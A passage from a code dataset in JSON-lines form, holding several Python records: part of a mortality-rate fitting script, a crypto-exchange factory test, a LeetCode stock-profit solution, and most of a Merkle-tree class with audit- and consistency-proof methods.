Under 10%.\n session.set_option(ode_step_size=params[\"ode_step_size_for_predict\"])\n # XXX make the session docs reflect exact columns and remove columns from\n # dataframe b/c that allows us to pass in data as avgints.\n avgint = mtother[[\"integrand\", \"location\", \"age_lower\", \"age_upper\", \"time_lower\", \"time_upper\"]]\n mt_fit, mt_not_fit = session.predict(max_fit, avgint, params[\"location_id\"])\n\n # XXX not handling the not_predicted case.\n draws = make_draws(model, less_stringent, max_fit, params[\"simulate_cnt\"], params)\n\n return max_fit, draws\n\n\ndef make_draws(model, less_stringent, max_fit, count, params):\n session = Session(locations=params[\"locations\"], parent_location=params[\"location_id\"], filename=\"simulate.db\")\n session.set_option(**params[\"fit_option\"])\n simulate_result = session.simulate(model, less_stringent, max_fit, count)\n\n draws = list()\n for draw_idx in range(simulate_result.count):\n sim_model, sim_data = simulate_result.simulation(draw_idx)\n # let's start a new session because the simulation results are associated\n # with a session and running a new fit will delete them.\n fit_file = f\"simulate{draw_idx}.db\"\n sim_session = Session(locations=locations, parent_location=location_id, filename=fit_file)\n sim_session.set_option(**params[\"fit_option\"])\n begin = timer()\n sim_fit_result = sim_session.fit(sim_model, sim_data)\n LOGGER.info(f\"fit {timer() - begin} success {sim_fit_result.success}\")\n if sim_fit_result.success:\n draws.append(sim_fit_result.fit)\n print(f\"sim fit {draw_idx} success\")\n else:\n print(f\"sim fit {draw_idx} not successful in {fit_file}.\")\n # XXX make the Session close or be a contextmanager.\n del sim_session\n return draws\n\n\ndef estimate_mortality_with_draws(mtother, draws, weights, params):\n # Given draws from a solution, let's set parameters on priors of a new model.\n # Don't assume that the model has the same ages and times, or that it has\n # the same distributions. Let the draws, as continuous functions, prime the\n # next priors.\n ages = params[\"ages\"]\n times = params[\"times\"]\n\n sub_model = Model(\n nonzero_rates=[\"omega\"], parent_location=params[\"location_id\"], child_location=[],\n covariates=None, weights=weights)\n omega_grid = SmoothGrid(ages=ages, times=times)\n omega_grid.value[:, :] = Gaussian(lower=0, upper=1.5, mean=0.01, standard_deviation=0.5)\n omega_grid.dage[:, :] = Gaussian(mean=0.0, standard_deviation=params[\"dage_ratio\"] * params[\"value_stdev\"])\n omega_grid.dtime[:, :] = Gaussian(mean=0.0, standard_deviation=params[\"dage_ratio\"] * params[\"value_stdev\"])\n sub_model.rate[\"omega\"] = omega_grid\n\n set_priors_from_draws(sub_model, draws)\n\n # The data has some small stdevs. 
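# The std-flooring idiom used above (assign rtol/atol columns, then take a row-wise
# max) in self-contained form; the numbers are made up. df[cols].max(axis=1) picks,
# per row, the largest of the candidate floors and the original standard deviation.
import pandas as pd

df = pd.DataFrame({'mean': [0.2, 0.001], 'std': [0.0005, 0.00001]})
with_floors = df.assign(rtol=0.005 * df['mean'], atol=1e-4)
floored = df.assign(std=with_floors[['rtol', 'atol', 'std']].max(axis=1))
assert (floored['std'] >= 1e-4).all()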
Let's give those a smallest value.\n smallest_stdev = mtother.assign(rtol=params[\"relative_min_std\"] * mtother[\"mean\"], atol=params[\"absolute_min_std\"])\n the_three = smallest_stdev[[\"rtol\", \"atol\", \"std\"]]\n less_stringent = mtother.assign(std=the_three.max(axis=1))\n\n sub_session = Session(locations=locations, parent_location=location_id, filename=\"subsession.db\")\n sub_session.set_option(**params[\"fit_option\"])\n begin = timer()\n sub_fit = sub_session.fit(sub_model, less_stringent)\n LOGGER.info(f\"fit {timer() - begin} success {sub_fit.success}\")\n\n draws = make_draws(sub_model, less_stringent, sub_fit.fit, params[\"simulate_cnt\"], params)\n\n return sub_fit, draws\n\n\ndef set_priors_from_draws(model, draws):\n \"\"\"Sets priors from posteriors of the *same model*.\"\"\"\n if len(draws) == 0:\n return\n\n for group_name, group in model.items():\n if group_name not in draws[0]:\n continue\n\n for key, prior_grid in group.items():\n if key not in draws[0][group_name]:\n continue\n\n ages = prior_grid.ages\n times = prior_grid.times\n draw_value, draw_dage, draw_dtime = gather_draws_for_grid(draws, group_name, key, ages, times)\n\n estimate_grid_parameters(prior_grid.value, draw_value, ages, times)\n estimate_grid_parameters(prior_grid.dage, draw_dage, ages[:-1], times)\n estimate_grid_parameters(prior_grid.dtime, draw_dtime, ages, times[:-1])\n\n\ndef set_priors_from_parent_draws(model, draws):\n \"\"\"Sets priors from posteriors of the *parent model*.\"\"\"\n assert len(draws) > 0\n\n for group_name, group in model.items():\n if group_name not in draws[0] or group_name == \"random_effect\":\n continue\n\n for key, prior_grid in group.items():\n if key not in draws[0][group_name]:\n continue\n\n ages = prior_grid.ages\n times = prior_grid.times\n if group_name == \"rate\" and (key, model.location_id) in draws[0][\"random_effect\"]:\n draw_value, draw_dage, draw_dtime = gather_draws_for_child_grid(\n draws, group_name, key, ages, times, location_id)\n LOGGER.debug(f\"Child prior found for {group_name} {key}\")\n elif group_name != \"rate\":\n draw_value, draw_dage, draw_dtime = gather_draws_for_grid(draws, group_name, key, ages, times)\n LOGGER.debug(f\"Prior found for {group_name} {key}\")\n else:\n LOGGER.debug(f\"No prior found for {group_name} {key}\")\n continue\n\n estimate_grid_parameters(prior_grid.value, draw_value, ages, times)\n estimate_grid_parameters(prior_grid.dage, draw_dage, ages[:-1], times)\n estimate_grid_parameters(prior_grid.dtime, draw_dtime, ages, times[:-1])\n\n\ndef gather_draws_for_grid(draws, group_name, key, ages, times):\n # Gather data from incoming draws into an array of (draw, age, time)\n draw_data = np.zeros((len(draws), len(ages), len(times)))\n for didx in range(len(draws)):\n one_draw = draws[didx][group_name][key]\n for aidx, age in enumerate(ages):\n for tidx, time in enumerate(times):\n draw_data[didx, aidx, tidx] = one_draw(age, time)\n\n draw_data = draw_data.transpose([1, 2, 0])\n draw_dage = np.diff(draw_data, n=1, axis=0)\n draw_dtime = np.diff(draw_data, n=1, axis=1)\n return draw_data, draw_dage, draw_dtime\n\n\ndef gather_draws_for_child_grid(draws, group_name, key, ages, times, location_id):\n # Gather data from incoming draws into an array of (draw, age, time)\n draw_data = np.zeros((len(draws), len(ages), len(times)))\n for didx in range(len(draws)):\n underlying = draws[didx][group_name][key]\n random_effect = draws[didx][\"random_effect\"][(key, location_id)]\n for aidx, age in enumerate(ages):\n for tidx, time in 
enumerate(times):\n draw_data[didx, aidx, tidx] = underlying(age, time) * np.exp(random_effect(age, time))\n\n draw_data = draw_data.transpose([1, 2, 0])\n draw_dage = np.diff(draw_data, n=1, axis=0)\n draw_dtime = np.diff(draw_data, n=1, axis=1)\n return draw_data, draw_dage, draw_dtime\n\n\ndef estimate_grid_parameters(grid_priors, draws, ages, times):\n for aidx, tidx in it.product(range(len(ages)), range(len(times))):\n age = ages[aidx]\n time = times[tidx]\n grid_priors[age, time] = grid_priors[age, time].mle(draws[aidx, tidx, :])\n\n\n# %%\nlogging.root.setLevel(logging.INFO)\nlocation_id = 101 # Canadia\nsex_id = 1\ngbd_round_id = 5\ndecomp_step = \"step1\"\nage_group_set_id = 12\n\nages_df = db_queries.get_age_metadata(age_group_set_id=age_group_set_id, gbd_round_id=gbd_round_id)\n# This comes in yearly from 1950 to 2018\nmtother = asdr_as_fit_input(location_id, sex_id, gbd_round_id, decomp_step, ages_df, with_hiv=True)\n# Reduce years by factor because it's slow with too much data.\n# Maybe smarter to work with a dense set of years, so limit to 1990-2000?\nmtother = mtother[(mtother.time_lower % 10) < 0.1]\n\n\n# %%\n# Locations, ages, and times on which the model will be based.\nlocations = pd.DataFrame(dict(\n location_id=[location_id],\n parent_id=[nan],\n name=[\"country\"],\n))\nages = np.sort(np.unique(np.concatenate([mtother.age_lower, mtother.age_upper])))\ntimes = np.sort(np.unique(mtother.time_lower))\ntimes = np.concatenate([times, times[-1:] + 1])\nLOGGER.info(f\"age cnt {len(ages)} time cnt {times}\")\n# Let step size be smallest age group size. No harm because predict is fast.\n# If you forget to change this for the fit, memory will explode.\node_step_size_for_predict = min(np.diff(ages))\nprint(f\"ode step size for predict {ode_step_size_for_predict}\")\n\n# Fitting mortality rate depends on prevalence because mortality is an\n# integrand. The prevalence is what determines the weight to calculate the\n# integrand. This is circular. Here, we use mortality rate as a guess\n# at mortality, use that to predict an approximate prevalence. 
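# gather_draws_for_grid above stacks values as (draw, age, time), transposes to
# (age, time, draw), then differences along ages (axis=0) and times (axis=1).
# A shape check with made-up sizes:
import numpy as np

stacked = np.zeros((5, 4, 3))           # 5 draws, 4 ages, 3 times
by_cell = stacked.transpose([1, 2, 0])  # -> (age, time, draw)
assert np.diff(by_cell, n=1, axis=0).shape == (3, 3, 5)  # one fewer age row
assert np.diff(by_cell, n=1, axis=1).shape == (4, 2, 5)  # one fewer time column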
Then\n# we will pass that approximate prevalence into the fit as a weight.\n\ninitial_mtother_guess = rectangular_data_to_var(mtother)\n\nweights = construct_weights(initial_mtother_guess, locations, ages, times, location_id, ode_step_size_for_predict)\n\n# %%\n\n# These are parameters on the fit.\nparams = dict(\n ages=ages,\n times=times,\n locations=locations,\n location_id=location_id,\n value_stdev=1e-1, # stdev on the value parameter, if we use Gaussian\n dage_ratio=50, # stdev on dage is dage_ratio * value_stdev\n dtime_ratio=50, # stdev on dtime is dtime_ratio * value_stdev\n absolute_min_std=1e-4, # Change data std to be at least this large.\n relative_min_std=0.005, # and at least this fraction of the mean.\n fit_step_size=5,\n simulate_cnt=5,\n extra_ages=[0.019, 0.077, .15, .5, 1, 2],\n ode_step_size_for_predict=ode_step_size_for_predict,\n)\nparams[\"fit_option\"] = dict(\n random_seed=0,\n ode_step_size=params[\"fit_step_size\"],\n age_avg_split=\" \".join(str(ea) for ea in params[\"extra_ages\"]),\n # quasi_fixed=\"true\",\n derivative_test_fixed=\"none\",\n max_num_iter_fixed=100,\n print_level_fixed=5,\n tolerance_fixed=1e-8,\n)\nprint(f\"age avg split str {params['fit_option']['age_avg_split']}\")\n\n# %%\n\nmax_fit, draws = estimate_mortality_hazard(mtother, initial_mtother_guess, weights, params)\nsecond_fit, second_draws = estimate_mortality_with_draws(mtother, draws, weights, params)\n\n# %%\nthird_fit, third_draws = estimate_mortality_with_draws(mtother, second_draws, weights, params)\n","sub_path":"examples/graduate_mortality.py","file_name":"graduate_mortality.py","file_ext":"py","file_size_in_byte":15843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"346700925","text":"from exchanges.factory import CreateExchangeService\n\nfrom exchanges.binance import BinanceService\nfrom pandas import DataFrame\n\n\nmessage = {\n 'action': 'CREATED',\n 'exchange': 'binance',\n 'symbol': 'UBT/ETH',\n 'exchange_order_id': '1',\n 'internal_order_id': '2',\n 'side': 'buy',\n 'quantity': '10',\n 'price': '100',\n 'cum_quantity_filled': '5',\n 'order_status': 'CREATED',\n 'server_ms': 1000,\n 'received_ms': 1000}\n\norder_book = DataFrame([{'side': 'ask', 'quantity': 20.0, 'price': 120.0, 'depth': 2, 'exchange': 'binance'},\n {'side': 'ask', 'quantity': 10.0, 'price': 110.0, 'depth': 1, 'exchange': 'binance'},\n {'side': 'bid', 'quantity': 12.0, 'price': 100.0, 'depth': 1, 'exchange': 'binance'},\n {'side': 'bid', 'quantity': 32.0, 'price': 90.0, 'depth': 2, 'exchange': 'binance'}])\n\n\ndef test_factory():\n idex = CreateExchangeService('idex', None, None, tick_tock=False)\n qryptos = CreateExchangeService('qryptos', None, None, tick_tock=False)\n binance = CreateExchangeService('binance', None, None)\n\n\nif __name__ == '__main__':\n test_factory()","sub_path":"exchanges/test/test_exchanges.py","file_name":"test_exchanges.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"776077","text":"\"\"\"\nDesign an algorithm to find the maximum profit. 
You may complete as many transactions as you like (i.e., buy one and\nsell one share of the stock multiple times).\n\nhttps://leetcode.com/explore/challenge/card/30-day-leetcoding-challenge/528/week-1/3287/\n\"\"\"\n\n\nclass Solution:\n def get_next(self, iterable):\n iterator = iter(iterable)\n try:\n current = next(iterator)\n for next_item in iterator:\n yield current, next_item\n current = next_item\n except StopIteration as e:\n return e\n\n def maxProfit(self, prices: list) -> int:\n profit = 0\n for current, next_item in self.get_next(prices):\n if next_item > current:\n profit = profit + (next_item - current)\n return profit\n\n\nif __name__ == '__main__':\n sln = Solution()\n print(sln.maxProfit([7,1,5,3,6,4]))\n","sub_path":"buy_and_sell.py","file_name":"buy_and_sell.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"433886170","text":"\"\"\"Provides the main class for Merkle-trees and related functionalites\n\"\"\"\n\nfrom .hashing import hash_machine\nfrom .utils import log_2, decompose, NONE\nfrom .nodes import Node, Leaf\nfrom .proof import Proof\nfrom .serializers import MerkleTreeSerializer\nfrom .exceptions import LeafConstructionError, NoChildException, EmptyTreeException, NoPathException, InvalidProofRequest, NoSubtreeException, NoPrincipalSubrootsException, InvalidTypesException, InvalidComparison, WrongJSONFormat, UndecodableRecordError, NotSupportedEncodingError, NotSupportedHashTypeError\nimport json\nfrom json import JSONDecodeError\nimport uuid\nimport os\nimport mmap\nimport contextlib\nfrom tqdm import tqdm\n\nNONE_BAR = '\\n ' + '\\u2514' + '\\u2500' + NONE # └─[None]\n\n\nclass MerkleTree(object):\n \"\"\"Class for Merkle-trees\n\n :param \\*records: [optional] The records initially stored by the Merkle-tree. If provided, the tree is constructed with\n as many leafs from the beginning, storing the hashes of the inserted records in the respective order.\n :type \\*records: str or bytes or bytearray\n :param hash_type: [optional] Defaults to ``'sha256'``. Should be included in ``hashing.HASH_TYPES`` (upper- or mixed-case\n with '-' instead of '_' allowed), otherwise an exception is thrown.\n :type hash_type: str\n :param encoding: [optional] Defaults to ``'utf_8'``. 
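# buy_and_sell.py above sums every positive day-over-day delta, and its get_next
# generator is the classic pairwise pattern. The same profit rule in two lines:
def max_profit(prices):
    return sum(b - a for a, b in zip(prices, prices[1:]) if b > a)

assert max_profit([7, 1, 5, 3, 6, 4]) == 7  # buy 1 -> sell 5, buy 3 -> sell 6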
Should be included in ``hashing.ENCODINGS`` (upper- or mixed-case\n with '-' instead of '_' allowed), otherwise an exception is thrown.\n :type encoding: str\n :param security: [optional] Defaults to ``True``.If ``False``, defense against second-preimage attack will be disabled\n :type security: bool\n\n :raises UndecodableRecordError: if any of the provided ``records`` is a bytes-like object which cannot be decoded with\n the provided encoding type\n :raises NotSupportedHashTypeError: if ``hash_type`` is not contained in ``hashing.HASH_TYPES``\n :raises NotSupportedEncodingType : if ``encoding`` is not contained in ``hashing.ENCODINGS``\n\n :ivar uuid: (*str*) uuid of the Merkle-tree (time-based)\n :ivar hash_type: (*str*) See the constructor's homonymous argument\n :ivar encoding: (*str*) See the constructor's homonymous argument\n :ivar security: (*bool*) Iff ``True``, security measures against second-preimage attack are activated\n :ivar hash: (*method*) Core hash functionality of the Merkle-tree\n :ivar multi_hash: (*method*) Hash functionality used by the Merkle-tree for performing inclusion tests (explicitly or\n implicitly upon a request for consistency proof)\n \"\"\"\n\n def __init__(self, *records, hash_type='sha256', encoding='utf-8', security=True):\n\n self.uuid = str(uuid.uuid1())\n\n try:\n # Hash type, encoding type and security mode configuration\n\n machine = hash_machine(\n hash_type=hash_type,\n encoding=encoding,\n security=security\n )\n\n except (NotSupportedEncodingError, NotSupportedHashTypeError):\n raise\n\n self.hash_type = hash_type.lower().replace('-', '_')\n self.encoding = encoding.lower().replace('-', '_')\n self.security = security\n self.hash = machine.hash\n self.multi_hash = machine.multi_hash\n\n # Initialized here so that consistency-proof works in some edge cases\n\n self.leaves = []\n self.nodes = set()\n\n # Tree generation\n\n for record in records:\n\n try:\n self.update(record=record)\n\n except UndecodableRecordError:\n raise\n\n# --------------------------- Boolean implementation ---------------------\n\n def __bool__(self):\n \"\"\"\n :returns: ``False`` iff the Merkle-tree has no nodes\n :rtype: bool\n \"\"\"\n\n return bool(self.nodes)\n\n# ------------------------------------ Properties ------------------------\n\n @property\n def root(self):\n \"\"\"Returns the current root of the Merkle-tree\n\n :returns: the tree's current root\n :rtype: nodes._Node\n\n :raises EmptyTreeException: if the Merkle-tree is currently empty\n \"\"\"\n if not self:\n raise EmptyTreeException\n\n return self._root\n\n @property\n def rootHash(self):\n \"\"\"Returns the current root-hash of the Merkle-tree, i.e., the hash stored by its current root\n\n :returns: the tree's current root-hash\n :rtype: bytes\n\n :raises EmptyTreeException: if the Merkle-tree is currently empty\n \"\"\"\n try:\n _root = self.root\n except EmptyTreeException:\n raise\n\n return _root.digest\n\n @property\n def length(self):\n \"\"\"Returns the Merkle-tree's current length, i.e., the number of its leaves\n\n :rtype: int\n \"\"\"\n return len(self.leaves)\n\n @property\n def size(self):\n \"\"\"Returns the current number of the Merkle-tree's nodes\n\n :rtype: int\n \"\"\"\n return len(self.nodes)\n\n @property\n def height(self):\n \"\"\"Calculates and returns the Merkle-tree's current height\n\n .. 
note:: Since the tree is binary *balanced*, its height coincides with the length of its leftmost branch\n\n :rtype: int\n \"\"\"\n\n length = len(self.leaves)\n\n if length > 0:\n return log_2(length) + 1 if length != 2**log_2(length) else log_2(length)\n else:\n return 0\n\n# ---------------------------------- Updating ----------------------------\n\n def update(self, record=None, digest=None):\n \"\"\"Updates the Merkle-tree by storing the hash of the inserted record in a newly-created leaf, restructuring\n the tree appropriately and recalculating all necessary interior hashes\n\n :param record: [optional] The record whose hash is to be stored into a new leaf.\n :type record: str or bytes or bytearray\n :param digest: [optional] The hash to be stored by the new leaf (after encoding).\n :type digest: str\n\n .. warning:: Exactly *one* of *either* ``record`` *or* ``digest`` should be provided\n\n :raises LeafConstructionError: if both ``record`` and ``digest`` were provided\n :raises UndecodableRecordError: if the provided ``record`` is a bytes-like object which could not be decoded with\n the Merkle-tree's encoding type\n \"\"\"\n if self:\n\n # ~ Height and root of the *full* binary subtree with maximum\n # ~ possible length containing the rightmost leaf\n\n last_power = decompose(len(self.leaves))[-1]\n last_subroot = self.leaves[-1].descendant(degree=last_power)\n\n # Store new record to new leaf\n\n try:\n new_leaf = Leaf(\n hashfunc=self.hash,\n encoding=self.encoding,\n record=record,\n digest=digest\n )\n\n except (LeafConstructionError, UndecodableRecordError):\n raise\n\n # Assimilate new leaf\n\n self.leaves.append(new_leaf)\n self.nodes.add(new_leaf)\n\n try:\n # Save child info before bifurcation\n old_child = last_subroot.child\n\n except NoChildException: # last_subroot was previously root\n\n self._root = Node(\n hashfunc=self.hash,\n encoding=self.encoding,\n left=last_subroot,\n right=new_leaf\n )\n\n self.nodes.add(self._root)\n\n else:\n # Bifurcate\n\n # Create bifurcation node\n\n new_child = Node(\n hashfunc=self.hash,\n encoding=self.encoding,\n left=last_subroot,\n right=new_leaf\n )\n\n self.nodes.add(new_child)\n\n # Interject bifurcation node\n\n old_child.set_right(new_child)\n new_child.set_child(old_child)\n\n # Recalculate hashes only at the rightmost branch of the tree\n\n current_node = old_child\n\n while True:\n current_node.recalculate_hash(hashfunc=self.hash)\n\n try:\n current_node = current_node.child\n except NoChildException:\n break\n\n else: # Empty tree case\n\n try:\n new_leaf = Leaf(\n hashfunc=self.hash,\n encoding=self.encoding,\n record=record,\n digest=digest\n )\n\n except (LeafConstructionError, UndecodableRecordError):\n raise\n\n self.leaves = [new_leaf]\n self.nodes = set([new_leaf])\n self._root = new_leaf\n\n\n# ---------------------------- Audit-proof utilities ---------------------\n\n def audit_path(self, index):\n \"\"\"Computes and returns the main body for the audit-proof requested upon the provided index\n\n Body of an audit-proof consist of an *audit-path* (a sequence of signed hashes) and a *proof-index* (the position\n within the above sequence where a subsequent proof-validation should start from)\n\n :param index: index (zero based) of the leaf where the audit-path computation should be based upon\n :type index: int\n :returns: starting position for application of hashing along with the tuple of signed hashes (pairs of the form\n *(+1/-1, bytes)*, the sign ``+1`` or ``-1`` indicating pairing with the right resp. 
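# The height property above computes ceil(log2(length)) via an integer floor-log;
# a quick equivalence check, with bit_length() standing in for utils.log_2:
import math

def height(length):
    floor_log = length.bit_length() - 1
    return floor_log + 1 if length != 2 ** floor_log else floor_log

for n in range(1, 65):
    assert height(n) == math.ceil(math.log2(n))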
left neighbour)\n :rtype: (int, tuple<(+1/-1, bytes)>)\n\n :raises NoPathException: if the provided index is out of range (including the empty Merkle-tree case)\n \"\"\"\n\n if index < 0:\n # ~ Handle the negative index case separately by raising NoPathException, since certain\n # ~ negative indices might otherwise be considered as valid positions\n raise NoPathException\n else:\n\n try:\n current_node = self.leaves[index]\n except IndexError:\n raise NoPathException # Covers also the empty tree case\n\n else:\n\n initial_sign = +1\n if current_node.is_right_parent():\n initial_sign = -1\n\n path = [(initial_sign, current_node.digest)]\n start = 0\n\n while True:\n\n try:\n current_child = current_node.child\n\n except NoChildException:\n break\n\n else:\n\n if current_node.is_left_parent():\n next_hash = current_child.right.digest\n\n if current_child.is_left_parent():\n path.append((+1, next_hash))\n else:\n path.append((-1, next_hash))\n\n else:\n next_hash = current_child.left.digest\n\n if current_child.is_right_parent():\n path.insert(0, (-1, next_hash))\n else:\n path.insert(0, (+1, next_hash))\n start += 1\n\n current_node = current_child\n\n return start, tuple(path)\n\n\n def auditProof(self, arg):\n \"\"\"Response of the Merkle-tree to the request of providing an audit-proof based upon the provided argument\n\n :param arg: the record (if type is *str* or *bytes* or *bytearray*) or index of leaf (if type is *int*) where the\n computation of audit-proof must be based upon\n :type arg: str or bytes or bytearray or int\n :returns: audit-proof appropriately formatted along with its validation parameters (so that it can be passed in\n as the second argument to the ``validations.validateProof()`` function)\n :rtype: proof.Proof\n\n :raises InvalidProofRequest: if the provided argument's type is not as prescribed\n \"\"\"\n\n if type(arg) not in (int, str, bytes, bytearray):\n raise InvalidProofRequest\n\n elif type(arg) is int:\n index = arg\n else:\n # ~ arg is of type str, or bytes or bytearray; in this case, detect the index\n # ~ of the first leaf having recorded the inserted argument; if no such leaf\n # ~ exists (i.e., the inserted argument has not been encrypted into the tree),\n # ~ set index equal to -1 so that a NoPathException be subsequently raised\n index = -1\n count = 0\n _hash = self.hash(arg)\n _leaves = (leaf for leaf in self.leaves)\n while True:\n\n try:\n _leaf = next(_leaves)\n except StopIteration:\n break\n\n else:\n if _hash == _leaf.digest:\n index = count\n break\n count += 1\n\n try:\n # Calculate proof path\n proof_index, audit_path = self.audit_path(index=index)\n\n except NoPathException: # Includes case of negative `arg`\n\n return Proof(\n provider=self.uuid,\n hash_type=self.hash_type,\n encoding=self.encoding,\n security=self.security,\n proof_index=-1,\n proof_path=()\n )\n else:\n return Proof(\n provider=self.uuid,\n hash_type=self.hash_type,\n encoding=self.encoding,\n security=self.security,\n proof_index=proof_index,\n proof_path=audit_path\n )\n\n\n# --------------------------- Consistency-proof utils ---------------------------\n\n\n def subroot(self, start, height):\n \"\"\"Returns the root of the unique *full* binary subtree of the Merkle-tree, whose leftmost leaf is located\n at the provided position ``start`` and whose height is equal to the provided ``height``\n\n :param start: index (zero based) of leaf where detection of subtree should start from\n :type start: int\n :param height: height of candidate subtree to be detected\n :type height: int\n 
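\n .. note:: For instance (an illustrative case): in a tree with 6 leaves, ``subroot(4, 1)`` returns the root of the full two-leaf subtree over positions 4 and 5, whereas ``subroot(4, 2)`` raises ``NoSubtreeException``, since no *full* binary subtree with 4 leaves begins at position 4.\n\n 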
:returns: root of the detected subtree\n :rtype: nodes._Node\n\n :raises NoSubtreeException: if no subtree does exists for the given parameters\n \"\"\"\n\n # Detect candidate subroot\n\n try:\n subroot = self.leaves[start]\n\n except IndexError:\n raise NoSubtreeException\n\n i = 0\n while i < height:\n try:\n next_node = subroot.child\n\n except NoChildException:\n raise NoSubtreeException\n\n else:\n\n if next_node.left is not subroot:\n raise NoSubtreeException\n\n subroot = subroot.child\n i += 1\n\n # ~ Verify existence of *full* binary subtree for the above\n # ~ detected candidate subroot\n\n right_parent = subroot\n i = 0\n\n while i < height:\n\n if isinstance(right_parent, Leaf):\n raise NoSubtreeException\n\n right_parent = right_parent.right\n i += 1\n\n return subroot\n\n def principal_subroots(self, sublength):\n \"\"\"Detects and returns in corresponding order the roots of the *successive*, *rightmost*, *full* binary\n subtrees of maximum (and thus decreasing) length, whose lengths sum up to the provided argument\n\n Returned nodes are prepended with a sign (``+1`` or ``-1``), carrying information used in the generation of\n consistency-proofs after extracting hashes\n\n :param sublength: a non-negative integer smaller than or equal to the Merkle-tree's current length, such that\n the corresponding sequence of subroots exists\n :returns: The signed roots of the detected subtrees, whose hashes are to be used for the generation\n of consistency-proofs\n :rtype: list<(+1/-1, nodes._Node)>\n\n :raises NoPrincipalSubrootsException: if the provided ``sublength`` does not fulfill the prescribed conditions\n \"\"\"\n\n if sublength < 0:\n raise NoPrincipalSubrootsException # Mask negative input case as incompatibility\n\n principal_subroots = []\n powers = decompose(sublength)\n start = 0\n for _power in powers:\n\n try:\n _subroot = self.subroot(start, _power)\n\n except NoSubtreeException:\n raise NoPrincipalSubrootsException # Incompatibility issue detected\n\n else:\n try:\n _child = _subroot.child\n _grandchild = _child.child\n\n except NoChildException:\n\n if _subroot.is_left_parent():\n principal_subroots.append((+1, _subroot))\n else:\n principal_subroots.append((-1, _subroot))\n\n else:\n\n if _child.is_left_parent():\n principal_subroots.append((+1, _subroot))\n else:\n principal_subroots.append((-1, _subroot))\n\n finally:\n start += 2**_power\n\n if len(principal_subroots) > 0:\n principal_subroots[-1] = (+1, principal_subroots[-1][1]) # Modify last sign\n\n return principal_subroots\n\n\n def minimal_complement(self, subroots):\n \"\"\"Complements optimally the subroot hashes detected by ``.principal_subroots`` with all necessary\n interior hashes of the Merkle-tree, so that a full consistency-path can be generated\n\n :param subroots: output of the ``.principal_subroots()`` method\n :type subroots: list\n :returns: a list of signed hashes complementing optimally provided input,\n so that a full consistency-path be generated\n :rtype: list<(+1/-1, bytes)>\n \"\"\"\n if len(subroots) == 0:\n return self.principal_subroots(self.length)\n\n complement = []\n\n while True:\n try:\n subroots[-1][1].child\n\n except NoChildException:\n break\n\n else:\n\n _subroot = subroots[-1][1]\n\n if _subroot.is_left_parent():\n\n if _subroot.child.is_right_parent():\n complement.append((-1, _subroot.child.right))\n else:\n complement.append((+1, _subroot.child.right))\n\n subroots = subroots[:-1]\n\n else:\n subroots = subroots[:-2]\n\n subroots.append((+1, _subroot.child))\n\n return 
complement\n\n def consistency_path(self, sublength):\n \"\"\"Computes and returns the main body for the consistency-proof requested for the provided parameters\n\n Body of a consistency-proof consist of a *consistency-path* (a sequence of signed hashes) and a *proof-index*\n (the position within the above sequence where a subsequent proof-validation should start from)\n\n :param sublength: length of a presumably valid previous state of the Merkle-tree\n :type sublength: int\n :returns: starting position for application of hashing along with a tuple of hashes signed with ``-1`` (leftmost\n hashes for inclusion test to be performed by the Merkle-tree itself) and a tuple of signed hashes for\n hash test to be performed from the Client's Side (the sign ``-1``, resp. ``+1`` indicating pairing\n with the left resp. right neigbour during proof validation)\n :rtype: (int, tuple<(-1, bytes)>, tuple<(+1/-1 bytes)>)\n\n :raises NoPathException: if the provided ``sublength`` is non-positive or no subroot sequence corresponds to it\n (i.e., if a ``NoPrincipalSubrootsException`` is implicitely raised)\n \"\"\"\n if sublength < 0 or self.length == 0:\n raise NoPathException\n\n try:\n left_subroots = self.principal_subroots(sublength)\n\n except NoPrincipalSubrootsException:\n raise NoPathException # Incompatibility issue detected\n\n else:\n\n right_subroots = self.minimal_complement([_ for _ in left_subroots])\n all_subroots = left_subroots + right_subroots\n\n if right_subroots == [] or left_subroots == []:\n\n all_subroots = [(-1, _[1]) for _ in all_subroots] # Reset all signs to minus\n proof_index = len(all_subroots) - 1 # Will start multi-hashing from endpoint\n\n else:\n proof_index = len(left_subroots) - 1 # Will start multi-hashing from midpoint\n\n # Collect sign-hash pairs\n\n left_path = tuple([(-1, _[1].digest) for _ in left_subroots])\n full_path = tuple([(_[0], _[1].digest) for _ in all_subroots])\n\n return proof_index, left_path, full_path\n\n\n def consistencyProof(self, oldhash, sublength):\n \"\"\"Response of the Merkle-tree to the request of providing a consistency-proof for the provided parameters\n\n Arguments of this function amount to a presumed previous state (root-hash and length) of the Merkle-tree\n\n :param oldhash: root-hash of a presumably valid previous state of the Merkle-tree\n :type oldhash: bytes\n :param sublength: presumable length (number of leaves) for the above previous state of the Merkle-tree\n :type sublength: int\n :returns: consistency-proof appropriately formatted along with its validation parameters (so that it\n can be passed in as the second argument to the ``validations.validateProof()`` function)\n :rtype: proof.Proof\n\n .. 
note:: If no proof-path corresponds to the provided parameters (i.e., a ``NoPathException`` is raised implicitly)\n or the provided parameters do not correspond to a valid previous state of the Merkle-tree (i.e., the\n corresponding inclusion-test fails), then the proof generated contains an empty proof-path, or, equivalently\n a negative proof-index ``-1`` is inscribed in it, so that it is predestined to be found invalid.\n\n :raises InvalidProofRequest: if the type of any of the provided arguments is not as prescribed\n \"\"\"\n\n if type(oldhash) is not bytes or type(sublength) is not int or sublength <= 0:\n raise InvalidProofRequest\n\n try:\n # Calculate proof path\n proof_index, left_path, full_path = self.consistency_path(sublength=sublength)\n\n except NoPathException: # Includes the empty-tree case\n\n return Proof(\n provider=self.uuid,\n hash_type=self.hash_type,\n encoding=self.encoding,\n security=self.security,\n proof_index=-1,\n proof_path=()\n )\n\n # Inclusion test\n\n if oldhash == self.multi_hash(signed_hashes=left_path, start=len(left_path) - 1):\n\n return Proof(\n provider=self.uuid,\n hash_type=self.hash_type,\n encoding=self.encoding,\n security=self.security,\n proof_index=proof_index,\n proof_path=full_path\n )\n else:\n return Proof(\n provider=self.uuid,\n hash_type=self.hash_type,\n encoding=self.encoding,\n security=self.security,\n proof_index=-1,\n proof_path=()\n )\n\n# ------------------------------ Inclusion tests ------------------------------\n\n def inclusionTest(self, oldhash, sublength):\n \"\"\"Verifies that the parameters provided correspond to a valid previous state of the Merkle-tree\n\n :param oldhash: root-hash of a presumably valid previous state of the Merkle-tree\n :type oldhash: bytes\n 